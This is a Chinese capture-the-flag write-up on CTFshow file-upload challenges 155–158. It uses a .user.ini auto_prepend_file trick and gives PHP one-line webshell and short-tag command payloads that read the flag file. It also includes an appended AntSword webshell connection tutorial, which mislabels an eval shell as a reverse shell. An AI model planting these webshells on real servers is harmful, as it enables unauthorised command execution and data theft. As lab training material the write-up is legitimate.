CTFshow web(php文件上传155-158)

文章讲述了PHP配置选项auto_append_file的作用,以及如何利用它进行后端检测。同时讨论了如何通过配置绕过安全过滤,尝试执行恶意代码,如木马。作者提醒注意PHP的安全性问题。

                                                                        web155

                                                    

老样子,还是那个后端检测。

知识点:

auto_append_file 是 PHP 配置选项之一,在 PHP 脚本执行结束后自动追加执行指定的文件。

当 auto_append_file 配置被设置为一个文件路径时,PHP 将在执行完脚本文件的所有代码后,自动加载并执行指定的文件。

这个配置选项可以用来在每个 PHP 脚本的结尾处执行一些共享的代码逻辑,例如清理工作、记录日志或执行一些全局操作。这样,就不必在每个脚本中显式编写和调用相同的代码,而是通过配置 auto_append_file 来实现统一的处理。

使用方法如下:

打开 PHP 的配置文件 php.ini。

找到 auto_append_file 配置项。

将要追加执行的文件路径设置给 auto_append_file 配置项,例如:

auto_append_file = "/path/to/your/file.php"
保存文件并重启 PHP 服务。

在接下来的 PHP 脚本执行后,指定的文件将会被自动加载和执行。

实战:先上传 .user.ini 文件,里面写入

 auto_prepend_file=111.png
(#上传时是 .user.png ,抓包修改为 .user.ini)

然后创建一个111.png文件,里面写入一句话木马<?php @eval($_POST["x"]); ?> 

之后访问/upload/

这里发现在上传111.png时不行,看来是被过滤了,那就换个<?=`tac ../flag*`木马就好了

<? echo 123;eval($_POST['x']); ?>

                                                                        web156

还是上面的套路,只是在我尝试<? echo 123;eval($_POST['x']); ?>时[]又被禁止了,这里直接换成短标签木马:

<?=`tac ../flag*`

或者直接把[]换成{}也是可以的

其他还是不变

                                                                                web157

其实不就多过滤了{}这个而已嘛,直接短标签木马上去就好了嘛

其他都和最初155一样

<?system('tac ../f*')?>

                                                                                web156

上面的<?system('tac ../f*')?>还可以继续白嫖,那么这里我也不测试这道题目比之前多过滤了什么

真诚希望我的文章能够帮助大家,谢谢!                  

### CTFShow Web 入门 文件上传 蚁剑 (AntSword) 连接教程 #### 准备工作 为了成功完成文件上传并利用蚁剑建立连接,需先准备环境。确保已安装蚁剑客户端,并准备好用于测试的恶意PHP脚本。 #### PHP Shell Payload 创建 创建一个简单的PHP反向Shell脚本 `shell.php`: ```php <?php @eval($_POST['cmd']);?> ``` 此代码片段允许通过POST请求执行任意命令[^1]。 #### 文件上传过程 使用给定URL进行文件上传操作。假设目标地址为 `http://example.com/upload` ,则可构造如下表单数据提交至服务器: ```html <form action="http://example.com/upload" method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload File" name="submit"> </form> ``` 将之前编写的 `shell.php` 作为待上传文件选择并提交[^2]。 #### 验证上传成果 确认文件是否成功上载到远程服务器指定目录下。通常情况下,可以通过浏览器直接访问该路径来验证,例如:`http://example.com/uploads/shell.php` 。如果页面返回空白,则说明上传成功。 #### 使用蚁剑连接 启动蚁剑工具,在新建站点时输入相应的参数配置: - **网站根目录**: `/var/www/html/` - **WebShell URL**: 如前所述成功的PHP shell链接 - **密码**: 设置于PHP代码中的密钥 (`cmd`) 按照上述设置完成后点击“保存”,随后即可尝试与远端服务器建立会话连接[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值